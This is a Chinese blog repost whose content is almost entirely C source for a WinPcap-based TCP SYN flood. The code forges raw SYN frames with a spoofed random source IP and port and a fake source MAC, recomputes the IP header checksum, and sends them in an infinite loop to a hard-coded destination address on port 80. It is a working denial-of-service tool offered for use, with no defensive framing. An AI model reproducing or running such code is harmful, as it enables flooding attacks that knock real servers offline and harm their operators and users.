winpcap实现syn攻击

来源：互联网发布：手机怎样备份所有数据编辑：程序博客网时间：2024/05/18 02:44
#define _W64  #define HAVE_REMOTE  #include<stdio.h>  #include<pcap.h>  #include<winsock2.h>  #include <time.h>  #include "remote-ext.h"    #pragma comment(lib,"wpcap.lib")  #pragma comment(lib,"WS2_32.lib")      #pragma pack(push,1)  typedef struct _TCP_SYN  {      unsigned char DstMAC[6];  // 目的mac地址      unsigned char SrcMAC[6];  // 源mac地址      unsigned char OtherData[12];      unsigned short Header_ChechSum; // 校验和      unsigned int SrcIP;       // Source IP address      unsigned int DstIP;       // Destination IP address      unsigned short SrcPort;   // Source IP Port      unsigned short DstPort;   // Destination IP Port,一般为80端口，值为0x5000      unsigned char Ohters[16];      unsigned short pak_checksum;      unsigned char OtherLast[1];  }TCP_SYN, *PTCP_SYN;  #pragma pack(pop)      unsigned char bufData[]="\x00\x25\x86\x27\xd1\x22\x90\x2b\x34\x60\xbd\x44\x08\x00\x45\x00"                          "\x00\x34\x61\xdc\x40\x00\x80\x06\x71\x83\xc0\xa8\x01\x6a\x7a\xe4"                          "\xea\x6d\x0b\x0c\x00\x50\xb9\xc2\xf5\x06\x00\x00\x00\x00\x80\x02"                          "\xff\xff\x8d\x8d\x00\x00\x02\x04\x05\xb4\x01\x03\x03\x01\x01\x01"                          "\x04\x02";      // clac the header's check sum  unsigned short checksum(unsigned short *buffer, int size)     {         unsigned long cksum=0;         while(size > 1)         {             cksum += *buffer++;          size -= sizeof(unsigned short);         }         if(size)      {             cksum += *(unsigned char*)buffer;        }         cksum = (cksum>>16) + (cksum & 0xffff);         cksum += (cksum>>16);         return  (unsigned short)(~cksum);     }       int main(int argc, char* argv[])  {      pcap_if_t *alldevs;      pcap_if_t *seldev;      pcap_t *fp;      char errbuf[PCAP_ERRBUF_SIZE];      srand(time(0));            /* 获取本机设备列表 */      if (pcap_findalldevs(&alldevs, errbuf) == -1)      {          fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);          exit(1);      }        // 找到一个有ip的就当有连网的网卡了      for (seldev = alldevs; seldev != NULL; seldev = seldev->next)      {          pcap_addr* pcapaddr = NULL;          for (pcapaddr= seldev->addresses; pcapaddr != NULL; pcapaddr = pcapaddr->next)          {              if (pcapaddr->addr->sa_data[2] != '\0' && pcapaddr->addr->sa_data[3] != '\0')              {                  break;              }          }          if (pcapaddr != NULL)          {              break;          }      }      if (seldev == NULL)      {          fprintf(stderr, "Can not find network!\n");          exit(1);      }        /* 打开这个输出设备 */      if ( (fp= pcap_open(seldev->name,            // 设备名          100,                // 要捕获的部分 (只捕获前100个字节)          PCAP_OPENFLAG_PROMISCUOUS,  // 混杂模式          1000,               // 读超时时间          NULL,               // 远程机器验证          errbuf              // 错误缓冲          ) ) == NULL)      {          fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", alldevs->name);          return -1;      }        // 修改源MAC、IP地址 , 并修改首部校验和      PTCP_SYN SynData = (PTCP_SYN)bufData;      while(1)      {          memcpy(SynData->SrcMAC, "\x01\x01\x01\x01\x01\x01", 6); // 源MAC地址 01:01:01:01:01:01          SynData->DstIP = inet_addr("123.125.114.144"); // 攻击的目标          SynData->DstPort = htons(80);  // 目标端口80          SynData->SrcIP = (unsigned int)rand(); // 源IP地址随机产生          SynData->SrcPort = (unsigned short)rand()%100+1024; // 源端口随机产生            SynData->Header_ChechSum = 0;          SynData->Header_ChechSum = checksum((unsigned short*)&bufData[14], 20); // 计算checksum  //      printf("%d\n", SynData->Header_ChechSum);            /* 发送数据包 */          // (wireshark 黑底红字为 校验和错误 的包).          if (pcap_sendpacket(fp, bufData, sizeof(bufData)-1 ) != 0)          {              fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(fp));              return -1;          }      }        /* 释放设备列表 */      pcap_freealldevs(alldevs);          return 0;  }
0 0